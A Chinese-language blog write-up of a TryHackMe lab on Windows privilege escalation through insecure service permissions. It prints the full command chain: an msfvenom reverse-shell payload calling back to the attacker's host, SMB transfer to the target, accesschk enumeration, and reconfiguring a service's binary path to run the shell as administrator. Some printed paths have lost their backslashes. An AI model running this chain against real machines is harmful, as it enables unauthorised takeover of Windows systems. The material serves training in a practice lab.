Windows提权(1.权限配置失误)

admin 2024年10月14日05:28:51评论8 views字数 1057阅读3分31秒阅读模式
Windows提权(1.权限配置失误)

点击蓝字关注我们

0x00:在线漏洞平台利用

本次的在线漏洞平台是Try hack me具体链接为https://tryhackme.com/room/windows10privesc。可以使用平台所提供的网页kali版,或者是用自己kali连到他们内网里面都可。

Windows提权(1.权限配置失误)

攻击机: kali ip 10.4.37.12

目标机器:windows10 ip 10.10.143.152

Windows提权(1.权限配置失误)

首先使用xfreerdp进行远程连接

命令: xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.143.152

Windows提权(1.权限配置失误)

0x01:制作反弹shell+传送到目标机器

为了控制一波我们的windows10,我们得先在kali本地制作一个反弹shell先。

命令:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.4.37.12 LPORT=667 -f exe -o reverseshell.exe

Windows提权(1.权限配置失误)

Windows提权(1.权限配置失误)

关于传送的到目标机器可以用kali自带的smbserver

命令: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

Windows提权(1.权限配置失误)

Windows提权(1.权限配置失误)

然后在我们的windows10的CMD命令行模式下输入

命令:copy \10.4.37.12kalirevershell.exe C:PrivEscreverseshell.exe

Windows提权(1.权限配置失误)

Windows提权(1.权限配置失误)

接着去到我们刚才存放的地方,记得提前在kali处打开波端口。一个点击就能获得了。

Windows提权(1.权限配置失误)

0x02:不安全的服务权限设计

由于管理员可能没有配置好相关用户权限导致普通用户可能对某些服务拥有过多的权限可以从普通用户升级为管理员。这里使用波攻击机所提供的accesschk.exe,可以看到user拥有更改daclsvc服务的service_change_config的权限。

命令: accesschk.exe -uwcqv "user" *

Windows提权(1.权限配置失误)

Windows提权(1.权限配置失误)

接下来就是查询波这个服务的路径,可以看到路径是在C:Program FilesDACL Servicedaclservice.exe,我们可以把路径指到我们的反弹shell里面

命令:sc qc daclsvc

Windows提权(1.权限配置失误)

Windows提权(1.权限配置失误)

命令: sc config daclsvc binpath=""C:PrivEscreverseshell.exe""

Windows提权(1.权限配置失误)

Windows提权(1.权限配置失误)

重定向以后我们可以重启波,记得再开一个nc,最后我们的权限已经是管理员了。

命令:net start daclsvc

Windows提权(1.权限配置失误)

原文始发于微信公众号(神隐攻防实验室):Windows提权(1.权限配置失误)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月14日05:28:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows提权(1.权限配置失误)https://cn-sec.com/archives/787862.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息